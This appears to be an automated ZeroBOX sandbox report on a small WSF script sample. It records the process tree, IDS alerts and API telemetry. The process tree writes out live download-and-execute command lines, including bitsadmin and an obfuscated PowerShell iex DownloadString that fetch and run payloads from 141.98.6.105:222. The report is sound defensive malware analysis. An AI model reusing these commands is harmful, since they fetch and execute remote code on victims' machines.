Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 7, 2023, 9:23 a.m.	June 7, 2023, 9:26 a.m.

Size	1.4KB
Type	XML b^_ document, ASCII text, with very long lines, with CRLF line terminators
MD5	`1571f34482e30885cf9ac9ef10df739b`
SHA256	`67fed322837b12ee99c217a280e4df42c2c4177b0753bb7f98a85b835b5e664b`
CRC32	`C8B587AB`
ssdeep	`24:D6f0pm6Y+6P6e6+6h67R86K6cF6hg6n+626YEM6aPq/nM4:WbDR5vSq/M4`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\INSYy.wsf
3048
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" bitsadmin /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB;wscript //E:VBScript 'C:\Users\Public\VB';
  2192
  - bitsadmin.exe "C:\Windows\system32\bitsadmin.exe" /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB
    2256
  - wscript.exe "C:\Windows\system32\wscript.exe" //E:VBScript C:\Users\Public\VB
    1228
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''http://141.98.6.105:222/r.png'')')|iex
      504

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
141.98.6.105	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49164 -> 141.98.6.105:222	2034581	ET HUNTING Terse Request for .txt - Likely Hostile	Potentially Bad Traffic
TCP 141.98.6.105:222 -> 192.168.56.102:49164	2026995	ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers	Potentially Bad Traffic
TCP 141.98.6.105:222 -> 192.168.56.102:49168	2035769	ET HUNTING [TW] Likely Hex Executable String	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 7, 2023, 9:23 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 7, 2023, 9:23 a.m.			0	0
IsDebuggerPresent June 7, 2023, 9:23 a.m.			0	0

Command line console output was observed (50 out of 59 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: BITSADMIN version 3.0 [ 7.5.7601 ] console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: BITS administration utility. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: (C) Copyright 2000-2006 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TRANSFERRING console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: 597.33 B/S console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TIME REMAINING: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: 0 Seconds console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: TRANSFERRED console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW June 7, 2023, 9:23 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e25b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e1ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e1ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e1ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e1ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e1ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e1ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e19f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e19f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e19f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e20b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e24f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e23b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e1ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006e1ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005776e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 7, 2023, 9:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00578020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 7, 2023, 9:23 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 287 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05007000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
